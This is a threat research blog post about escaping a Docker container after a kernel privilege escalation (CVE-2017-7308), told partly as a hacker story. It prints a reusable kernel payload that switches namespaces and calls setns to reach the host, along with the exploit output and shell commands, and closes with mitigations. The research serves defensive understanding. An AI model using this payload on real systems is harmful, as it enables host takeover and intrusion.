THREAT RESEARCH BLOG POST

The Route to Root: Container Escape Using Kernel Exploitation

 

March 4, 2019 | | Nimrod Stoler

Imagine.

Just imagine that you are a black-hat hacker sitting in some seedy internet café in Europe, doing a dirty job on behalf of one of those secret, underground organizations we only hear about in the movies. You scan your servers and routers (well, they’re not actually yours, but you know) to see if any one of your smart, brute-force attacks got lucky and you have an open session inside one of those large enterprises you’ve been gunning for for so long.

You put an arrogant grin on your face. Your system is scanning thousands of web pages across the Internet, from corporate websites to social media and local newspapers, in an effort to find hints to corporate users’ passwords. It then builds a long dictionary of possible passwords per username and automatically tries them across corporate servers.

Suddenly, you notice some movement on one of your Brazilian servers (OK, not really “your” server.) Your heart is pounding – seems like one of the passwords your system came up with fits a database server on the other side of the globe. A few long seconds pass before your terminal spits out the long awaited SSH lines:

Using username "john".
Welcome to Ubuntu 4.8.0 LTS (GNU/Linux 4.8.0-41-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

92 packages can be updated.
0 updates are security updates.

Last login: Thu Jan 21 16:28:41 2019 from 52.68.23.12
[email protected]:~$

“Yes!” You shout and people around you in the café stop their chatting and turn their annoyed faces to you, but you don’t care.

You immediately recognize this IP as belonging to EnterpriseX, one of the large enterprises that you targeted, and now you have a shell on one of their machines!

[email protected]: ~$ uname –a
Linux fb68d81579cf 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 17:11:16 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

It seems you landed on a Linux machine on EnterpriseX and you are running as a user called John.

The machine has not been updated for quite some time and it is running kernel version 4.8.0-41. A few clicks later, you find you are on a MySQL server belonging to EnterpriseX, but you are logged in as a simple user.

After a brief check on the Internet, you realize: This must be your luck day! This version is vulnerable to a privilege escalation (CVE-2017-7308[i]), which also has a ready-made exploit on-line.

You can now almost feel the dollar bills touching your fingertips. You order another coffee, press a few more buttons on your (worn-out) keyboard to load the CVE-2017-7308 exploit to John’s machine. Then, with a noisy, triumphant “enter,” you run the exploit on EnterpriseX’s machine.

Gaining root would allow you to read, modify and delete all of the database records, attached devices and processes running on John’s machine. You can then continue to mine for credentials, access other applications running on the machine, access SSH keys to other machines, scan the network and, armed with the necessary credentials, move laterally to win over EnterpriseX’s priceless data.

The SSH session, now already running the exploit, starts spitting out the following lines:

[.] starting
[.] system has 2 processors
[.] checking kernel version
[.] kernel version '4.8.0-41-generic' detected
[~] done, version looks good
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^

 

You get the long awaited prompt:

[email protected]:/

 

Your fingers slide on the keyboard to check your root capabilities:

[email protected]:/# cat /proc/self/status
Name:	cat
Umask:	0022
State:	R (running)
CapInh:	0000000000000000
CapPrm:	0000003fffffffff
CapEff:	0000003fffffffff
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000
Seccomp:	2
……

“Mission accomplished,” you think to yourself…

But pretty soon you understand that all your wonderful, hacker-style trickery just got you inside a jail…

You check the process list:

[email protected]:/# ps -aef
UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan30 pts/0    00:00:00 /bin/bash
root         16      1  0 Jan30 pts/0    00:00:00 ./poc
root         18     16  0 Jan30 pts/0    00:00:00 ./poc
root         19     18  0 Jan30 pts/0    00:00:00 sh -c /bin/bash
root         20     19  0 Jan30 pts/0    00:00:00 /bin/bash
root         52     20  0 12:07 pts/0    00:00:00 ps -aef

 

Where are all the processes?

You check the devices list:

[email protected]:/dev# ls
console  fd    mqueue  ptmx  random  stderr  stdout  urandom  zero
core     full  null    pts   shm     stdin   tty

None of the important devices are here.

You check if you can write to the file system:

[email protected]: /# echo 1 > /proc/sysrq-trigger
bash: sysrq-trigger: Read-only file system

 

The file system is read only!

You almost had it. You almost reached the finish line. Everything was within your reach, but now it’s all gone. How did this happen to you?

Incident Analysis

What was it that our black-hat hacker was facing that she could not overcome? Although the exploit worked as it was designed to and promoted user John to a full-fledged root, it did not produce any meaningful results because our hacker took over a Docker Linux container running on EnterpriseX’s machine.

Linux containers take advantage of the fundamental virtualization concept of Linux namespaces. Namespaces are a feature of the Linux kernel that partitions kernel resources at the operating system level. Docker containers use Linux kernel namespaces to restrict any user, including root, from directly accessing the machine’s resources.

In a previous blog post, we wrote about hacking the Play-with-Docker environment and reaching the underlying host by loading kernel modules. The default Docker container does not allow loading modules from the container to the kernel by blocking the CAP_SYS_MODULE capability. But here our hacker ran a privilege escalation exploit and is now root with all capabilities, including CAP_SYS_MODULE.

Perhaps not all is lost for our hacker friend. Let’s try to load a module then:

[email protected]: /# insmod kernelmod.ko
insmod: ERROR: could not insert module kernelmod.ko: Operation not permitted

Although we have the required capabilities as root, the container environment does not permit us to install new modules to the kernel and abuse the container in order to escape to the host.

Let’s try a second tactic to escape to the host. Make a new device pointing to the host’s hard drive and mount it inside the container:

[email protected]:/dev# mknod xvda1 b 202 1
[email protected]:/dev# ls
console  fd    mqueue  ptmx  random  stderr  stdout  urandom  zero
core     full  null    pts   shm     stdin   tty     xvda1

 

And then mount the device:

[email protected]:/dev# mount xvda1 /mnt
mount: /mnt: permission denied.

As we can see, this route is also blocked by the Docker container[ii].

Other exploitable kernel functions, such as access to raw I/O, usage of the DAC_READ_SEARCH (as implemented by the Shocker exploit) and others are completely blocked by the namespaced environment, thus not allowing the root superuser to abuse its privileges and escape to the underlying host.

The major reason we could not further exploit the container is one of defense-in-depth. The idea of defense-in-depth is to provide multiple levels of defense for an attacker to breach, similar to how a castle relies on multiple defenses such as moats, thick walls and inner keeps. In this case, although the hacker had breached the first line of defense and managed to escalate privileges to full root, the Seccomp defense, setup as an extra layer of defense as part of the defense-in-depth methodology, stopped the escape from container to host.

 

Sympathy for the Black-Hat

Nobody likes sad endings. We all want the hero of our story to win, even if she is a bad guy. So, we decided to help our black-hat hacker achieve her goal.

Let’s start with the current exploit. Below is the part that runs as the original exploit:

void get_root_payload(void) {

        ((_commit_creds)(COMMIT_CREDS))(
                ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
        );
}

This original exploit calls the prepare_kernel_cred() function with 0 (or NULL), which creates a fresh, new credential structure and, if passed NULL as its argument, sets the uid/guid to 0 (root) and all the capability fields to 1. The commit_creds() function installs the new credentials on the current task. We’ve already seen this at work and know this is not enough.

Our next step in this exploit is to add the following lines after the commit_creds() function:

unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);
((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);

The first line obtains the task_struct structure of virtual process 1, i.e the first process inside the container[iii]. The task_struct describes the executing program: open files, the process address space, pending signals, the process’s state, the namespaces the process is assigned to, etc.

Our goal is to change our process’s namespaces to those of the host’s. Linux kernel’s namespaces are stored in a special structure called nsproxy, so after obtaining the task_structure’s address, we call the switch_task_namespaces() function with the task_structure of process 1 and the address of init_nsproxy structure, which contains the namespaces of the init process[iv].

Each process’s namespaces may be accessed in /proc/<pid>/ns:

Current process namespaces:

[email protected]:/# ls /proc/self/ns -lia
total 0
dr-x--x--x 2 root root 0 Feb  3 09:47 ./
dr-xr-xr-x 9 root root 0 Feb  3 09:47 ../
lrwxrwxrwx 1 root root 0 Feb  3 09:47 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 ipc -> 'ipc:[4026532478]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 mnt -> 'mnt:[4026532476]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 net -> 'net:[4026532481]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 pid -> 'pid:[4026532479]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 uts -> 'uts:[4026532477]'

 

Each virtual file above designates a different kernel namespace, with a total of seven namespaces. The numbers in brackets (in green) are the inode designators for each namespace.

[email protected]:/# ls /proc/1/ns -lia
total 0
dr-x--x--x 2 root root 0 Jan 31 16:52 ./
dr-xr-xr-x 9 root root 0 Jan 31 16:52 ../
lrwxrwxrwx 1 root root 0 Feb  3 09:47 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 ipc -> 'ipc:[4026531839]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 mnt -> 'mnt:[4026531840]'
lrwxrwxrwx 1 root root 0 Jan 31 16:52 net -> 'net:[4026531957]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 pid -> 'pid:[4026532479]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 uts -> 'uts:[4026531838]'

Above is the listing of namespaces for process 1 (remember our exploit copied the namespaces of init_nsproxy into this process.)

As you can see, some of the namespaces in process 1 have different inodes now. Ipc (inter-process communications namespace), mnt (mount namespace), net (network namespace), pid (PID namespace) and uts (host name & Domain name namespace) have all changed their inodes.

This gives us the opportunity to try the nsenter function. nsenter is a wrapper which changes the current namespaces with those of other processes[v]. Below we request a change to all of process 1’s namespaces:

[email protected]:/# nsenter --target 1 --all
nsenter: reassociate to namespace 'ns/cgroup' failed: Operation not permitted

 

Once again, the tactics of defense-in-depth kicks in and stops us from using nsenter. Specifically the Docker Seccomp profile does not allow calls to the setns syscall, which the nsenter application calls.

After some trial and error we arrived at the following exploit code, which calls the setns syscall from the kernel exploit instead of from the container:

long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
((_sys_setns)(SYS_SETNS))( fd, 0);

fd      = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
((_sys_setns)(SYS_SETNS))( fd, 0);

 

The first line prepares the parameter to the setns syscall. It uses the open syscall to open the mnt (mount) namespace’s virtual file of process 1, located in /proc/1/ns. The open function returns a file descriptor, stored in the fd variable.

The second line sends the file descriptor to the setns syscall to perform the required namespace changes.

The entire exploit payload is therefore:

void get_root_payload( void) {

        ((_commit_creds)(COMMIT_CREDS))(
                ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
        );

        // -------- NAMESPACE DOCKER EXPLOIT  --------
        // copy nsproxy from init_nsproxy to pid 1 of the container
        unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);

        // now, do the magic.... !!!! Simple black magic doesn't work on current process!!!!
        ((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);

        // prepare the two namespace FDs by opening the respective files
        long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);

        fd      = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);
}

Changing the mnt and pid namespaces is enough to achieve the desired escape to the host.

The above code can be used in any future privilege escalation vulnerability found in the Linux kernel to escape a containerized environment.

Back in Black
You order another coffee and gaze for a few seconds through the large coffee shop window. Then you take a last look at your new exploit. It is ready for prime time, so you load it to EntepriseX’s machine and run it with a humble ‘enter’ this time.

[.] starting
[.] system has 2 processors
[.] checking kernel version
[.] kernel version '4.8.0-41-generic' detected
[~] done, version looks good
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^

 

With a trembling hand you check to see if you have root access to the host:

[email protected]:/# ls /
bin    dev   initrd.img      lib64       mnt   proc  sbin  sys  var
boot   etc   initrd.img.old  lost+found  mnt1  root  snap  tmp  vmlinuz
cdrom  home  lib             media       opt   run   srv   usr  vmlinuz.old

 

You check the process list:

[email protected]:/# ps -aef
UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan31 ?        00:00:08 /sbin/init auto noprompt
root          2      0  0 Jan31 ?        00:00:00 [kthreadd]
root          3      2  0 Jan31 ?        00:00:02 [ksoftirqd/0]
root          5      2  0 Jan31 ?        00:00:00 [kworker/0:0H]
root          7      2  0 Jan31 ?        00:00:08 [rcu_sched]
root          8      2  0 Jan31 ?        00:00:00 [rcu_bh]
root          9      2  0 Jan31 ?        00:00:00 [migration/0]
root         10      2  0 Jan31 ?        00:00:00 [lru-add-drain]
root         11      2  0 Jan31 ?        00:00:00 [watchdog/0]
root         12      2  0 Jan31 ?        00:00:00 [cpuhp/0]
root         13      2  0 Jan31 ?        00:00:00 [cpuhp/1]
root         14      2  0 Jan31 ?        00:00:00 [watchdog/1]
root         15      2  0 Jan31 ?        00:00:00 [migration/1]
root         16      2  0 Jan31 ?        00:00:00 [ksoftirqd/1]
root         18      2  0 Jan31 ?        00:00:00 [kworker/1:0H]
root         19      2  0 Jan31 ?        00:00:00 [kdevtmpfs]
root         20      2  0 Jan31 ?        00:00:00 [netns]
root         21      2  0 Jan31 ?        00:00:00 [khungtaskd]
root         22      2  0 Jan31 ?        00:00:00 [oom_reaper]
root         23      2  0 Jan31 ?        00:00:00 [writeback]

 

Yes. You have access to the underlying host. All processes. All files. All devices.

You now own the initial foothold… EnterpriseX’s network is next[vi]!

Conclusion and Suggested Mitigations

In a previous blog post, we showed how an attacker can exploit a privileged container and use it to escape to the underlying host. In contrast, this blog post shows how Docker containers’ defense-in-depth strategy temporarily stopped our black-hat hacker from escaping to the underlying host. The hacker was using an off-the-shelf Linux kernel exploit that failed to escape the containerized environment it was jailed in.

We then expanded the exploit’s payload to include code that manipulated the container’s namespaces by overwriting container’s process 1 namespaces with the host’s namespaces. The exploit finishes by calling the setns syscall, which changes the current process’s namespaces into process 1’s and the host’s namespaces, practically tearing down the namespace walls between container and host and accomplishing a full escape to host.

A first mitigation would be to use a non-generic kernel version. Devising an exploit for a known vulnerability is difficult for many reasons, one of them being KASLR. KASLR bypass is usually a challenge for exploit writers. Using a generic kernel version for production applications is a bad idea because it makes KASLR bypass easier.

A second mitigation concerns the kernel code. Since the entire exploit runs in the context of the Linux kernel, we need to think of changes to the Linux kernel itself. We suggest changing the switch_task_namespaces kernel, which we used in our exploit, function in /kernel/nsproxy.c to an inline function, making it more difficult for an attacker to find the exact location of the nsproxy structure inside the randomized task_struct structure[vii].

 

[i] This Linux kernel bug was discovered by Andrey Konovalov

 

[ii] Although the container allows for creating new devices using mknod, it does not allow either reading or writing to key devices. This is accomplished by setting strict device cgroups and then locking the file system to read only as part of the defense-in-depth strategy.

 

[iii] For more on information on task_structure and Linux kernel processes see https://notes.shichao.io/lkd/ch3/

 

[iv] The Linux kernel hangs if we try to change the running process’s namespaces, so we had to use another tactic. We imported the init_nsproxy of the host processes to the container’s process 1 and then changed namespaces for the current process to the namespaces of process 1 within the container.

 

[v] See http://man7.org/linux/man-pages/man1/nsenter.1.html

 

[vi] Justin Cormack from Docker Security had rightly commented that the Docker seccomp profile is still running even after running the exploit and currently continues to block certain syscalls. Although our hacker reached root namespaces, some operations are still blocked when called from within the container’s processes.

 

[vii] We are aware of the fact that other exploit methods are available to escape the containerized environment. For example, using the kernel exploit for re-setting the filesystem read-only flag to read/write. We believe a thorough examination is in place; however, it is not within the scope of this blog post.

 

Share This